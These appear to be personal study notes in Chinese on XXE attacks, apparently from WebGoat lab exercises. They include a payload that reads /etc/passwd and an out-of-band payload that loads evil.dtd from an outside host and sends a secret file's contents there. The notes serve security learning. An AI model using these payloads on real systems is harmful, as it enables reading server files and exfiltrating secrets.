XXE | ZQQ's docs

服务器端存的时候就会被替换了

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE author [
  <!ENTITY js SYSTEM "file:///etc/passwd">
]>
<comment><text>&js;</text></comment>

API没有限制只能是json，传xml也可以

DoS 构造了一个指数级增长的情况

XXE Out-of-band 外带数据参看https://www.invicti.com/learn/out-of-band-xml-external-entity-oob-xxe

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE data [
  <!ENTITY % file SYSTEM
  "file:///home/webgoat/.webgoat-2025.3/XXE/csrf-zqqqqq/secret.txt">

  <!ENTITY % dtd SYSTEM
  "http://xxx.226:12345/evil.dtd">

  %dtd;
]>

<comment><text>&send;</text></comment>

<!ENTITY % all "<!ENTITY send SYSTEM 'http://xxx.226:12345/?collect=%file;'>">
%all;